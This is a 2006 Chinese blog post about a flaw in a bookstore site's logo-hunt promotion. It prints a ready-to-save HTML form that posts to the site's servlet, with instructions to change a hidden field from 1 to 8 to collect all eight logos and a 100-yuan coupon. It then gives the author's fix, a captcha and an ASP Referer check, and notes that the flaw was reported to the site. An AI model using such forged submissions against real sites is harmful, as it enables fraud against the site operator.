在哪里摔倒
就在哪里自己爬起来
精彩网上书城,八个威威虎,有漏洞,没有防止跨网攻击
活动时间:8月8日至8月28日
活动内容:活动期间,网友访问精彩网的所有栏目寻找不同形状的威威虎,每寻找到5个不同形状威威虎LOGO将获得价值10元购书现金券。寻找到7个不同形状威威虎将获得价值30元购书现金券,寻找到8个全套威威虎将获得价值100元的购书现金券。
活动规则:活动期间,精彩在所有页面随机设置整套8个形状不同的威威虎LOGO,放置于各频道页面中,网友每找到一款威威虎在虎尾上填写好会员用户名与密码,每寻找到5个不同形状的威威虎将获得价值10元的购书现金券,寻找到7个不同形状的威威虎将获得价值30元的购书现金券券,寻找到8个全套威威虎将获得价值100元的购书现金券。网友获得的购书现金券精彩网将在活动结束后以邮件的形式发送到寻宝网友的邮箱帐号里。
要八个威威虎的代码很容易,下面的代码保存:test.htm
<form method=post name=form_2y action=http://www.exvv.com/servlet/Soubao>
<img src=/images/soubao/1.gif width=136>
恭喜获得1号威威虎,请做标记:
用户 <input type=text name=userName size=20 maxlength=20>
密码 <input type=password name=password size=20 maxlength=20>
<input type=hidden name=num value=8>
<input type=hidden name=dtime value="2006-08-12 12:15:34">
<input type=hidden name=checknum>
<input type=submit name=Submit value=提交>
</form>
红色的,value值,从1、2、3、4、5、6、7、8提交一次,有八个威威虎了
改正,asp方法:
方法一:加验证码
方法二:防跨网提交
'**************************************************
'函数名:spanweb
'作 用:检查是否跨站进入该页面
'参 数:myurl 对应的页面地址
'返回值:无
'**************************************************
function spanweb()
dim backurl,weburl
backurl=cstr(Request.ServerVariables("HTTP_REFERER"))
weburl=cstr(Request.ServerVariables("SERVER_NAME"))
if mid(backurl,8,len(weburl))<>weburl then
call showerr("请没要跨网提交数据")
response.end
end if
end function
因为偷威威虎是不对的,所以我要告诉他们有漏洞,要补好,因为八个威威虎==100元购书现金卷
---------------------------------------------------------------------
我把这个漏洞发给http://www.exvv.com/的管理员的邮箱里了,他们没有回复过,他们没有修改过,我觉得很奇怪,现在我知道为什么了
这个网站是想把这个购书现金卷派很多出去:
使用规则:每张订单实付金额满68元可使用一张10元金额购物券,同一订单只能使用一张购物现金券。
使用截止日期:2006年11月30日
如果一个人,偷了100元购书现金卷,如果他要把现金卷全用了,他就要在2006年11月30日前在这个网站买十次书,一次要大于68元,所以是大于680元,一本68元的书,进货很少钱,网站送10元,赚很多钱
所以,网站是想把购书现金卷发出去,有漏洞他们更开心
我很笨蛋,我害怕他们亏本,我还要告诉他们有漏洞
2006-09-15
